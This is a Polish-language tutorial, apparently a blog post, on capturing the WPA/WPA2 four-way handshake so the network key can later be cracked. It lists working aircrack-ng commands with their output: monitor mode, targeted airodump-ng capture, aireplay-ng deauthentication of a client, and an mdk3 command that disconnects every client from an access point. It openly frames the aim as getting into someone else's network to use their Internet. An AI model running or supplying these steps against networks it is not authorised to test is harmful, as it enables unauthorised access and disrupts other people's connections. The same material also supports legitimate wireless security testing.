[
WiFi] – Łapanie Hand-Shake
WPA
WPA2/PSK TKIP jest już silniejszym zabezpieczeniem niż WEP i WPA,
dostanie się do zabepieczonej sieci zajmie nam dużo więcej czasu niż
w
przypadku WEP
.
Zobaczysz tutaj, jak łatwo odzyskać hasło z sieci bezprzewodowej
chronionej przez WPA/WPA2.
Pierwsze co, aby móc zaatakować klucz musisz przechwycić coś co nazywa
się
4-way handshake
, czyli 4-stopniowe podawanie ręki. W nim zapisany
jest klucz dostępu do sieci, zaszyfrowany oczywiście i to właśnie ten klucz
musimy złamać by podkradać komuś Internety.
Przełącz kartę sieciową w tryb monitor, zrób to używając
airmon-ng.
airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of
time, you may want to
kill
(
some of
)
them!
PID Name
1150
avahi-daemon
1152
NetworkManager
1154
avahi-daemon
1324
wpa_supplicant
Interface Chipset Driver
wlan0 Atheros ath9k -
[
phy0
]
(
monitor mode enabled on mon0
)
Żeby przechwycić 4-way handshake musisz mieć dużo czasu jak i
szczęścia, przekazywane jest ono tylko wtedy gdy nawiązywane jest
połączenie klienta z AP od zera i gdy zostanie do końca poprawnie
nawiązane.
airodump-ng musisz ustawić tak by przechwytywało tylko pakiety
kierowane do określonego AP, dobrze też mierzyć tylko w kanał na którym
nadaje serwer (filtrowanie pakietów to podstawa szybkich ataków).
U mnie atakujemy sieć NASA o BSSID: 00:04:ED:A3:80:11, działającej na
kanale 1, dane zapisuję do pliku NASA i czekam na handshake.
airodump-ng mon0
--bssid
00:04:ED:A3:80:11
-c
1
-w
NASA
[
CH 1
][
Elapsed: 8 s
][
2011-01-12 17:08
]
BSSID PWR RXQ Beacons
#Data, #/s CH MB ENC CIPHER AUTH E
00:04:
ED:A3:80:11
-56
93 77 0 0 1 54 WPA2 CCMP PSK N
BSSID STATION PWR Rate Lost Packets Probes
00:04:
ED:A3:80:11 48:5D:60:34:A8:59 0 0
-54
0 2 NASA
Jak mogłeś zauważyć nie użyłem opcji –ivs, bo potrzebujemy pełnych
pakietów, a nie części jak to jest przy atakowaniu WEPa.
Podczas przechwytywania pakietów okno wygląda podobnie do tego.
[
CH 1
][
Elapsed: 3 s
][
2011-01-12 17:24
]
BSSID PWR RXQ Beacons
#Data, #/s CH MB ENC CIPHER AUTH ESSID
00:04:
ED:A3:80:11
-53
40 40 12 9 1 54 WPA2 CCMP PSK NASA
BSSID STATION PWR Rate Lost Packets Probes
00:04:
ED:A3:80:11 48:5D:60:34:A8:59 0 0
-54
0 5 NASA
00:04:
ED:A3:80:11 00:4F:78:00:A2:A5
-40
24 - 1 28 25
Aby spowodować by klienci atakowanej sieci rozłączyli się z nią i ponownie
połączyli:
aireplay-ng mon0
--deauth
0
-a
00:04:ED:A3:80:11
-c
48:5D:60:34:A8:59
12:37:23
Waiting
for beacon frame
(
BSSID: 00:04:ED:A3:80:11
)
on channel 14
12:37:26
mon0 is on channel 14, but the AP uses channel 1
•
-
a podajesz adres MAC atakowanego routera
•
-
c adres MAC karty sieciowej, którą chcesz odciąć od sieci, aby mieć
pewność, że ten komputer się za moment połączy ponownie podaj ten
adres, przy którym jest największy ruch sieciowy
Po tym poleceniu odciąłem właśnie sam siebie z sieci.
Dane odczytasz z tabel w airodump-ng :inft:
Aby wyrzucić wszystkich z danej sieci można też użyć programu mdk3.
mdk3 mon0 d
-t
00:04:ED:A3:80:11
Disconnecting between: 01:00:5E:00:00:16 and: 00:04:ED:A3:80:11
Disconnecting between: 33:33:00:00:00:0C and: 00:04:ED:A3:80:11
Disconnecting between: 01:00:5E:7F:FF:FA and: 00:04:ED:A3:80:11
....
Disconnecting between: 48:5D:60:34:A8:59 and: 00:04:ED:A3:80:11
d oznacza odłączenie wszystkich kart sieciowych z sieci, której MAC adres
podany po parametrze -
t
z/w ide mamie Internet zrobić.
A tak wygląda okno ekranu gdy handshake jest już przechwycony:
[
CH 1
][
Elapsed: 12 s
][
2011-01-12 17:24
]
<strong>
[
WPA handshake: 00:04:ED:A3:80:11
]
</strong>
BSSID PWR RXQ Beacons
#Data, #/s CH MB ENC CIPHER AUTH ESSID
00:04:
ED:A3:80:11
-53
40 130 27 9 1 54 WPA2 CCMP PSK NASA
BSSID STATION PWR Rate Lost Packets Probes
00:04:
ED:A3:80:11 48:5D:60:34:A8:59 0 0
-54
0 25 NASA
00:04:
ED:A3:80:11 00:4F:78:00:A2:A5
-40
24 - 1 28 25
No właśnie tak wygląda okno gdy handshake jest złapany przez
skaner airodump-ng. Głównym problemem tego ataku jest złapanie
handshake. Nie da się go złapać bez aktywnego użytkownika w sieci.